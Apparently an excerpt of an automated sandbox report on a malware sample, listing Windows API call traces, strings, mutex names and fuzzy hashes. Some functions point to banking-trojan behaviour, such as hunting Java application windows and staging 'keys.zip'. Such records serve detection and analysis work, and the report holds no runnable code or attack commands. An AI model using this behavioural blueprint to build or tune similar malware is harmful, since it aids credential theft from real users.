                                                                                                                                                                                                              • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                            • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1392322707-905597979
                                                                                                                                                                                                            • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                            • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD19CC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD19D9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD19ED
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD19FF
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD17D0,00000000,00000000,00000000), ref: 02BD1A10
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD1A1F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD1A26
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CB84), ref: 02BD1A2D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CB84,KBP), ref: 02BD1A47
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD1A50
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02BD19C0
                                                                                                                                                                                                            • KBP, xrefs: 02BD1A33
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                            • API String ID: 4173420962-1701721152
                                                                                                                                                                                                            • Opcode ID: c9728fffeae7bebabb120f8af099eeea7574f2594a7aa071a9635a118bd4e80e
                                                                                                                                                                                                            • Instruction ID: 17d90afdf5bf5e5a5ff614d7e8a6d35884979228bb7e529a97e0fd2ac6cf6099
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9728fffeae7bebabb120f8af099eeea7574f2594a7aa071a9635a118bd4e80e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0101D630AC67127BF37157A84C4AF8E36989F04B95F104654FB6A761C097E095048BAA
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$malloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2190258309-0
                                                                                                                                                                                                            • Opcode ID: 4a15916ac8bc6abc2fe2c6db27c7bf57d77e59468c25e4416f5a0c02237f86a8
                                                                                                                                                                                                            • Instruction ID: 17ab6b3c8d91d0f1395282d63e341f22f7b90562148f0d5d61060ed70478eadd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a15916ac8bc6abc2fe2c6db27c7bf57d77e59468c25e4416f5a0c02237f86a8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C84131B1D416118BC721DFD8E8C0B9AB7A5EB44B14F1B4EB9E44A47608E731A860CFD2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c35d695e3bd8e19de5a0471123e2fc32ff4311193cf77c9fc93b21f1187ca94c
                                                                                                                                                                                                            • Instruction ID: 14a43275888d6cb6a7b5411c98b97984546beb866c874734d84ecda34e4a60e3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c35d695e3bd8e19de5a0471123e2fc32ff4311193cf77c9fc93b21f1187ca94c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94C1D471A106169FCB14CF2CC8A4BAB7BB5EF49344B2482C8ED59EB341D731EA05CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            • Opcode ID: ebdefe0ccf7dca4d477b1ac3c68d8fca596ad1d5551be48629f1ca220201ef3e
                                                                                                                                                                                                            • Instruction ID: 899c3b54fc84715de8db1ab819a65c2972a449072b2a6a59033f0abab28b18a8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebdefe0ccf7dca4d477b1ac3c68d8fca596ad1d5551be48629f1ca220201ef3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3513FB1D412159ADB50DF94C884AEB7BB9AF08340F0441BAEE0CAF285D7745645CFE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D098), ref: 02BD3B70
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3BB1
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD3BBB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD3BC3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD3BD4
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD3BDB
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD3BE8
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D098,?,02BD3D9C), ref: 02BD3C57
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: keys.zip$path1.txt
                                                                                                                                                                                                            • API String ID: 1373881290-1274251082
                                                                                                                                                                                                            • Opcode ID: 458abd76119522f9249da9a04a44250f75919daf90a7f6d978517eda264d8423
                                                                                                                                                                                                            • Instruction ID: b130c36ab5bc641ae5260634855e32cce1384bdbf5e97494b5fa8f7c66111347
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 458abd76119522f9249da9a04a44250f75919daf90a7f6d978517eda264d8423
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74410B715047454BCB258F3898A4BEABBE5FF56340F0489D4EACAD7301EB71D984CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD5124
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5133
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD513A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD5152
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5169
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD516F
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,76DC34D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5190
                                                                                                                                                                                                            • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51B7
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51CB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 02BD5100
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                            • API String ID: 734199406-1705633369
                                                                                                                                                                                                            • Opcode ID: 59407088c45d3f96c12e9dce8df0aec07d858e74a022405fea52fa324c200e17
                                                                                                                                                                                                            • Instruction ID: 0e9cf4be968420a69ab9577f85f06457942fe9f2421a44671ff3d99cab780442
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59407088c45d3f96c12e9dce8df0aec07d858e74a022405fea52fa324c200e17
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73214BB2D00209A7D73196649C44FFFB7BDDFC4751F600599FA45A7140FBB0AA858BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 02BD53BE
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BD53D2
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02BC56AF), ref: 02BD53E3
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02BD53F3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02BC56AF), ref: 02BD5430
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02BC56AF), ref: 02BD5433
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02BC56AF), ref: 02BD5440
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,02BC56AF), ref: 02BD5443
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1866686876-3277137149
                                                                                                                                                                                                            • Opcode ID: 5f1ff0a7f5f79077544492c81645d3fb017464aeecada54f94fdc10154486e5f
                                                                                                                                                                                                            • Instruction ID: d306593d33da86453497e9890489daf807d48075d96c7a9859f061b54284835c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f1ff0a7f5f79077544492c81645d3fb017464aeecada54f94fdc10154486e5f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E811B631A812017BD7709B759C08FDB7BADEF84795F848954FA05D3140EB75E610CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02BD440C
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD4422
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02BD4430
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD4439
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD4451
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD4463
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD446E
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0D19C,VEFK), ref: 02BD4488
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                            • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK
                                                                                                                                                                                                            • API String ID: 849374196-3911370694
                                                                                                                                                                                                            • Opcode ID: 74c070173a625b91f7cc3745d2a0c81690cef5ac9c0f3d0cb3d2865b227f30e5
                                                                                                                                                                                                            • Instruction ID: 6e5379fd9e14bbcd310906457cba0bb8ce58d7863ce2144634fe176fa982e413
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74c070173a625b91f7cc3745d2a0c81690cef5ac9c0f3d0cb3d2865b227f30e5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3501D631AC17152AE27157A89C46F9EB398DF44B60F458694FF45A7180AFF0A8004AA5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02BFA450), ref: 02BD0121
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02BFA488), ref: 02BD0131
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02BFA4B8), ref: 02BD0141
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02BFA4D8), ref: 02BD0151
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02BFA450), ref: 02BD0161
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02BFA488), ref: 02BD0171
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02BFA4B8), ref: 02BD0181
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02BFA4D8), ref: 02BD0191
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FindWindow
                                                                                                                                                                                                            • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                            • API String ID: 134000473-1757792087
                                                                                                                                                                                                            • Opcode ID: 6c0378dc8aec1016bc5a9e336741f4cfc87bfd9cbb9a6c626d562103563487b0
                                                                                                                                                                                                            • Instruction ID: 6507347dabeeb9bb17e0e6c5bbc881a96df2ad1623b503f180b81ea67488e093
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c0378dc8aec1016bc5a9e336741f4cfc87bfd9cbb9a6c626d562103563487b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8F07A947C2327687AD8716D3D0AFA53B444B90EC9B4984D2BF5EF9028F6C0F48A05F1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02BCCBAC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCCBB9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCCBCD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCCBDF
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCCBEE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCCBF5
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C260,BSS), ref: 02BCCC0F
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCCC15
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02BCCBA0
                                                                                                                                                                                                            • BSS, xrefs: 02BCCBFB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                            • String ID: BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                            • API String ID: 3206501308-3528105533
                                                                                                                                                                                                            • Opcode ID: b9198685e6f8360afb788fb5f271cd940dd87b445aece72c0dc3395b7549ed77
                                                                                                                                                                                                            • Instruction ID: 5628affa57d5bea8c31145610786fadca07330723ef85a4cf5566143a11be4cc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9198685e6f8360afb788fb5f271cd940dd87b445aece72c0dc3395b7549ed77
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76017B30AC9705BBE26167A4AC09F0B7B9C9F08F90F60074DFB5AA31C09BB0940087B6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,76F93050,76F930D0,76F93080), ref: 02BB91F0
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB9204
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB920F
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02BB9237
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB9254
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB9265
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BB9285
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BB929C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB92DC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02BB9324
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02BB932D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2125184990-0
                                                                                                                                                                                                            • Opcode ID: 20f10a510a81ef053ed4583aca36543a4f859f0ab5dca3e425710381b5e5047b
                                                                                                                                                                                                            • Instruction ID: c0ef45637424ea677fc3a5773095195ce87454e17970645b28d93282a4fe0ba3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20f10a510a81ef053ed4583aca36543a4f859f0ab5dca3e425710381b5e5047b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC41E071E80240ABD7209FA4EC84FBA77A9AB48750F104E45FB61972C6C6F0E820CF60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC01F4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02BC020C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC020F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC021C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC021F
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,-02BFFAE4), ref: 02BC023C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02BC0259
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC0260
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0270
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC02B5
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC02C9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3911349929-0
                                                                                                                                                                                                            • Opcode ID: ea13bc43d418810d208c7041b71f86a2f7dcb1b5b112fea86db6e8778ce682ae
                                                                                                                                                                                                            • Instruction ID: feb3dd982e59b500c3bf38f771ceabc178be96fd4ff11dae9ef7b2fc5fd39a39
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea13bc43d418810d208c7041b71f86a2f7dcb1b5b112fea86db6e8778ce682ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F417472A40304EFD760DFA8DC84F6BB7B8EB44710F10895CEA859B680DB70E954CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC0071
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 02BC008C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC008F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BC009C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC009F
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02BC00BC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02BC00D9
